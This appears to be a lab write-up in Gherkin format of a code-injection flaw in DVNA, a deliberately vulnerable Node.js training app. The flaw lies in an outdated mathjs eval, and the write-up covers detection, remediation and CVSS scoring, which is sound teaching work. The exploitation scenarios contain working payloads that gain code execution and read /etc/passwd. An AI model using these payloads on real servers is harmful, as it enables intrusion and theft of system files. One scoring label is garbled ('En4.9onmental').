## Version 1.4.2
## language: en

Feature:
  TOE:
    DVNA
  Category:
    Using components with known vulnerabilities
  Location:
    /app/calc - ping_address (Parameter)
  CWE:
    CWE-0095: Improper Neutralization of Directives in Dynamically Evaluated
    Code ('Eval Injection') -base-
      https://cwe.mitre.org/data/definitions/95.html
    CWE-0094: Improper Control of Generation of Code ('Code Injection') -class-
      https://cwe.mitre.org/data/definitions/94.html
    CWE-0991: SFP Secondary Cluster: Tainted Input to Environment -category-
      https://cwe.mitre.org/data/definitions/991.html
    CWE-0937: Using Components with Known Vulnerabilities -category-
      https://cwe.mitre.org/data/definitions/937.html
  CAPEC:
    CAPEC-035: Leverage Executable Code in Non-Executable Files -detailed-
      http://capec.mitre.org/data/definitions/35.html
    CAPEC-636: Hiding Malicious Data or Code within Files -standard-
      http://capec.mitre.org/data/definitions/636.html
    CAPEC-165: File Manipulation -meta-
      http://capec.mitre.org/data/definitions/165.html
  Rule:
    REQ.262: https://fluidattacks.com/web/es/rules/262/
  Goal:
    Execute arbitrary code in the server
  Recommendation:
    Keep third party libraries updated

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running DVNA in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  No access control
    Given I see the code at "dvna/routes/appHandler.js"
    """
    194 module.exports.calc = function (req, res) {
    195   if (req.body.eqn) {
    196     res.render('app/calc', {
    197       output: mathjs.eval(req.body.eqn)
    198     })
    199   } else {
    200     res.render('app/calc', {
    201       output: 'Enter a valid math string like (3+3)*2'
    202     })
    203   }
    204 }
    """
    Then I see it evals expressions with mathjs
    And from "package.json" I see it's using an outdated mathjs version
    """
    "dependencies": {
      ...
      "mathjs": "3.10.1",
      ...
    }
    """
    And it has a known vulnerability in the eval function

  Scenario: Dynamic detection
  Checking for known vulns
    Given I go to "http://localhost:8000/app/calc"
    And the application prompts me to enter a math equation
    Then I input "3;" and get an interesting response "[]"
    Then I try injecting a js command "3;console.log(1)"
    And get an error
    """
    Error: Undefined symbol console
      at undef (/app/node_modules/mathjs/lib/expression/node/SymbolNode.js:92:11
      )
      at eval (eval at Node.compile (/app/node_modules/mathjs/lib/expression/nod
      e/Node.js:71:19), <anonymous>:3:523)
      at eval (eval at Node.compile (/app/node_modules/mathjs/lib/expression/nod
      e/Node.js:71:19), <anonymous>:3:646)
      at Object.eval (eval at Node.compile (/app/node_modules/mathjs/lib/express
      ion/node/Node.js:71:19), <anonymous>:3:682)
      at string (/app/node_modules/mathjs/lib/expression/function/eval.js:40:36)
    ...
    """
    Then I notice the expression is being evaluated by mathjs's eval function
    Given there is a known vulnerability in this function, I test for it
    """
    cos.constructor("return 'a'")()
    """
    Then I get "a" returned and I know I have got RCE in the node server

  Scenario: Exploitation
  Stealing /etc/passwd
    Given I can run js code in the node server via mathjs.eval
    Then I send this to the vulnerable function
    """
    cos.constructor("buffer = Buffer.allocUnsafe(8192); process.binding('fs').re
    ad(process.binding('fs').open('/etc/passwd', 0, 0600), buffer, 0, 4096); ret
    urn buffer")()
    """
    And get returned the contents of /etc/passwd [evidence](passwd.png)

  Scenario: Remediation
  Access control
    Given I update the mathjs dependency
    """
    "dependencies": {
      ...
      "mathjs": "5.4.1",
      ...
    }
    """
    Then the vuln isn't there anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.9/10 (Critical) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.2/10 (Critical) - E:F/RL:O/RC:C/
  En4.9onmental: Unique and relevant attributes to a specific user environment
    9.2/10 (Critical) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-25
